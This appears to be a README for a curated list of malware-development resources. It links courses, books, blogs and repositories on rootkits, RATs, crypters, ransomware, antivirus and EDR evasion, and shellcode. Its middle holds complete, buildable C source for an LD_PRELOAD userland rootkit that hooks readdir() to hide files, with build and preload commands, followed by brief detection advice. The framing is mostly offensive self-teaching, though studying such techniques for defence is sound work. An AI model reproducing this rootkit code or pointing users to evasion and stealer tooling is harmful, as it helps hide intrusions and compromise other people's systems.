⠀⠀⠀⠀⠀⣠⣴⣶⣿⣿⠿⣷⣶⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣶⣷⠿⣿⣿⣶⣦⣀⠀⠀⠀⠀⠀ ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣶⣦⣬⡉⠒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠚⢉⣥⣴⣾⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀ ⠀⠀⠀⡾⠿⠛⠛⠛⠛⠿⢿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⣿⣿⣿⠿⠿⠛⠛⠛⠛⠿⢧⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⣿⡿⠟⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⣠⣤⠶⠶⠶⠰⠦⣤⣀⠀⠙⣷⠀⠀⠀⠀⠀⠀⠀⢠⡿⠋⢀⣀⣤⢴⠆⠲⠶⠶⣤⣄⠀⠀⠀⠀⠀⠀⠀ ⠀⠘⣆⠀⠀⢠⣾⣫⣶⣾⣿⣿⣿⣿⣷⣯⣿⣦⠈⠃⡇⠀⠀⠀⠀⢸⠘⢁⣶⣿⣵⣾⣿⣿⣿⣿⣷⣦⣝⣷⡄⠀⠀⡰⠂⠀ ⠀⠀⣨⣷⣶⣿⣧⣛⣛⠿⠿⣿⢿⣿⣿⣛⣿⡿⠀⠀⡇⠀⠀⠀⠀⢸⠀⠈⢿⣟⣛⠿⢿⡿⢿⢿⢿⣛⣫⣼⡿⣶⣾⣅⡀⠀ ⢀⡼⠋⠁⠀⠀⠈⠉⠛⠛⠻⠟⠸⠛⠋⠉⠁⠀⠀⢸⡇⠀⠀⠄⠀⢸⡄⠀⠀⠈⠉⠙⠛⠃⠻⠛⠛⠛⠉⠁⠀⠀⠈⠙⢧⡀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⡇⢠⠀⠀⠀⢸⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡇⠀⠀⠀⠀⢸⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠟⠁⣿⠇⠀⠀⠀⠀⢸⡇⠙⢿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠰⣄⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⠖⡾⠁⠀⠀⣿⠀⠀⠀⠀⠀⠘⣿⠀⠀⠙⡇⢸⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠄⠀ ⠀⠀⢻⣷⡦⣤⣤⣤⡴⠶⠿⠛⠉⠁⠀⢳⠀⢠⡀⢿⣀⠀⠀⠀⠀⣠⡟⢀⣀⢠⠇⠀⠈⠙⠛⠷⠶⢦⣤⣤⣤⢴⣾⡏⠀⠀ ⠀⠀⠈⣿⣧⠙⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⢊⣙⠛⠒⠒⢛⣋⡚⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⡿⠁⣾⡿⠀⠀⠀ ⠀⠀⠀⠘⣿⣇⠈⢿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡿⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⡟⠁⣼⡿⠁⠀⠀⠀ ⠀⠀⠀⠀⠘⣿⣦⠀⠻⣿⣷⣦⣤⣤⣶⣶⣶⣿⣿⣿⣿⠏⠀⠀⠻⣿⣿⣿⣿⣶⣶⣶⣦⣤⣴⣿⣿⠏⢀⣼⡿⠁⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠘⢿⣷⣄⠙⠻⠿⠿⠿⠿⠿⢿⣿⣿⣿⣁⣀⣀⣀⣀⣙⣿⣿⣿⠿⠿⠿⠿⠿⠿⠟⠁⣠⣿⡿⠁⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠈⠻⣯⠙⢦⣀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀⣠⠴⢋⣾⠟⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠙⢧⡀⠈⠉⠒⠀⠀⠀⠀⠀⠀⣀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠐⠒⠉⠁⢀⡾⠃⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠳⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⣠⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢦⡀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢀⡴⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
This repo serves as a list of resources for malware development. Note: I am just a learner; I am sharing what I have, some of these resources may be poor, and you can help by adding things.
Having some experience with C and assembly is going to help. Some resources for C and assembly:
- C for Everyone: Programming Fundamentals
- learn-c
- C cheatsheet
- Architecture 1001: x86-64 Assembly
- x86 Assembly
Lots of malware-related content.
Has an amazing malware development series; I would recommend taking a look.
Some good posts.
Dope Maldev Content.
Amazing LKM rootkit series and maldev posts.
Horse Pill: A New Type of Linux Rootkit
Not a talk, but a good LKM rootkit series.
Good talk on Creating and Countering the Next Generation of Linux Rootkits
Kernel Mode Threats and Practical Defenses
Alex Ionescu - Advancing the State of UEFI Bootkits
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
HQ Malware Content.
Has an amazing series on writing your RAT from scratch.
Amazing malware content: a good code injection series and Linux material.
Has a good LKM rootkit series.
There are some courses I would love to recommend.
RED TEAM Operator: Malware Development Essentials course | Sektor7
This course will teach you how to become a better ethical hacker, pentester and red teamer by learning malware development. It covers developing droppers, trojans and payload/DLL injectors using some basic C and Intel assembly skills.
RED TEAM Operator: Malware Development Intermediate course
Advanced malware development techniques in Windows, including: API hooking, 32-/64-bit migrations, reflective binaries and more.
RingZerø: Windows Kernel Rootkits: Techniques and Analysis
Key Learnings:
- Machine architecture for kernel programmers
- Virtual memory management
- Interrupts and exceptions
- CPU security features
- Windows kernel architecture
- Kernel components (Ps, Io, Mm, Ob, Se, Cm, etc.)
- System mechanisms
- Debugging with WinDbg
- Rootkit techniques
- Driver development
CodeMachine: Windows Kernel Rootkits
Topics:
- Kernel Attacks
- Kernel Shellcoding
- Kernel Hooking and Injection
- Kernel Callbacks
- Kernel Filtering
- Kernel Networking
- Virtualization Based Security
- The Art of Computer Virus Research and Defense
- The Giant Black Book of Computer Viruses
- Designing BSD Rootkits: An Introduction to Kernel Hacking
- Rootkits and Bootkits
- The Antivirus Hackers' Handbook
Make your own first FUD crypter
Malware Development – Welcome to the Dark Side: Part 1
Art of Malware
Malware Development Part 1
Basic Ransomware guide
Understanding TRITON and the Missing Final Stage of the Attack (good read)
Master of RATs - How to create your own Tracker
Amazing article to read with some good resources (Personal Tale and the Road to Malware Development, Resources)
PT_NOTE -> PT_LOAD x64 ELF virus written in Assembly
The magic of LD_PRELOAD for Userland Rootkits (a good read if you want to get into rootkits; this post covers userland rootkits)
(Recommended read) If you want to create your first userland rootkit and only know C, this post is a good starting point for rootkit development.
Function Hooking Part I: Hooking Shared Library Function Calls in Linux
Inline Hooking for Programmers (Part 1: Introduction)
Inline Hooking for Programmers (Part 2: Writing a Hooking Engine)
PE injection for beginners
Becoming-rat-your-system
Complete guide on LKM hacking
The best series, I would say, if you want to get into programming/malware dev: it starts with the programming you need, including assembly, and then moves into maldev.
Fileless malware
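The two userland rootkit posts and the shared-library hooking article above all rest on the same mechanism: a preloaded object is placed first in the dynamic linker's symbol lookup order, so a function it defines shadows libc's, and `dlsym(RTLD_NEXT, ...)` lets the shadow call through to the real one. The following is an added example written for this list, not code from any of the linked posts; the `HIDE_PREFIX` marker, the file name and the choice of hiding directory entries are assumptions made for the demonstration.

```c
/* hidefiles.c: userland rootkit-style hook of readdir()/readdir64() via LD_PRELOAD.
 * Build:  gcc -shared -fPIC -o hidefiles.so hidefiles.c   (add -ldl on glibc < 2.34)
 * Use:    LD_PRELOAD=./hidefiles.so ls -la /tmp
 * Every directory entry whose name starts with HIDE_PREFIX disappears from the
 * listing of any dynamically linked program that lists directories via libc. */
#define _GNU_SOURCE          /* RTLD_NEXT and struct dirent64 */
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>

/* Assumed marker for this example: entries starting with this prefix are hidden. */
#define HIDE_PREFIX "rk_"

/* Policy: should this directory entry be filtered out of readdir() results?
 * Kept separate from the hooks so it can be tested without preloading anything. */
int should_hide(const char *name)
{
    return name != NULL &&
           strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* Interposed readdir(). The preloaded object comes first in the lookup order,
 * so every readdir() call in the process lands here. dlsym(RTLD_NEXT, ...)
 * resolves to the next definition after this object, i.e. libc's readdir(). */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    struct dirent *ent;

    if (real_readdir == NULL) {
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
        if (real_readdir == NULL)
            return NULL;            /* cannot reach libc; behave as end-of-directory */
    }
    while ((ent = real_readdir(dirp)) != NULL) {
        if (!should_hide(ent->d_name))
            return ent;             /* visible entry: pass it through unchanged */
        /* hidden entry: drop it and fetch the next one */
    }
    return NULL;                    /* end of directory */
}

/* Programs built with _FILE_OFFSET_BITS=64 (coreutils among them) call
 * readdir64() instead, so the same treatment is needed for that symbol. */
struct dirent64 *readdir64(DIR *dirp)
{
    static struct dirent64 *(*real_readdir64)(DIR *) = NULL;
    struct dirent64 *ent;

    if (real_readdir64 == NULL) {
        real_readdir64 = (struct dirent64 *(*)(DIR *))dlsym(RTLD_NEXT, "readdir64");
        if (real_readdir64 == NULL)
            return NULL;
    }
    while ((ent = real_readdir64(dirp)) != NULL)
        if (!should_hide(ent->d_name))
            return ent;
    return NULL;
}

/* Stand-alone demo: built as a normal executable, the readdir() call below
 * binds to the definition in this file, so the filtering is visible without
 * a preload. Pass a directory as argv[1], default is the current one. */
int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : ".";
    struct dirent *ent;
    DIR *d = opendir(path);

    if (d == NULL) {
        perror("opendir");
        return 1;
    }
    while ((ent = readdir(d)) != NULL)
        printf("%s\n", ent->d_name);
    closedir(d);
    return 0;
}
```

Two practical points follow from how this works. The hook only exists inside processes that go through the dynamic linker and through libc, so a statically linked tool, or anything that issues `getdents64` itself, sees the hidden entries; comparing such output against `ls` is a standard way to detect this class of rootkit, as is checking `/etc/ld.so.preload` and the `LD_PRELOAD` environment of running processes. And the hook must cover every library entry point the target program might use (here both `readdir` and `readdir64`), or the hiding is only partial.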
Examining the Morris Worm Source Code
IoT Malware
DoublePulsar SMB backdoor analysis
Eset Turla Outlook backdoor report
Writing a custom encoder
Engineering antivirus evasion
Analysis of Project Sauron APT
WastedLocker analysis
Lazarus shellcode execution
Detailed analysis of Zloader
BendyBear shellcode malware
A Basic Windows DKOM Rootkit
Loading Kernel Shellcode
Windows Kernel Shellcode on Windows 10 – Part 1
Windows Kernel Shellcode on Windows 10 – Part 2
Windows Kernel Shellcode on Windows 10 – Part 3
Introduction to Shellcode Development
Autochk Rootkit Analysis
pierogi backdoor
Pay2Kitten
STEELCORGI
Lebanese Cedar APT
LazyScripter
Maze deobfuscation
Darkside overview
SunBurst backdoor - FireEye analysis
Code obfuscation techniques
SideCopy APT tooling
Hiding in PEB sight: Custom loader
Zloader: New infection technique
FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines
A tale of EDR bypass methods
In-depth dive into the security features of the Intel/Windows platform secure boot process
Process Injection Techniques
Adventures with KernelCallbackTable Injection
Useful Libraries for Malware Development
Parent Process ID (PPID) Spoofing
Mutants Sessions Self Deletion
OffensiVe Security with V - Process Hollowing
Looking for Remote Code Execution bugs in the Linux kernel
memory-analysis-evasion
100% evasion - Write a crypter in any language to bypass AV
One of the best malware development forums, which helped me a lot.
A collection of source code for various RATs, Stealers, and other Trojans.
An example of hijacking the dynamic linker with a custom interpreter which loads and executes modular viruses.
A summary of linux rootkits published on GitHub.
Collection of ancient computer virus source codes.
FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware.
Ebpfkit is a rootkit powered by eBPF.
Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.
Evasions encyclopedia gathers methods used by malware to evade detection when run in virtualized environment.
System call hooking on arm64 linux via a variety of methods.
A curated list of awesome resources related to executable packing.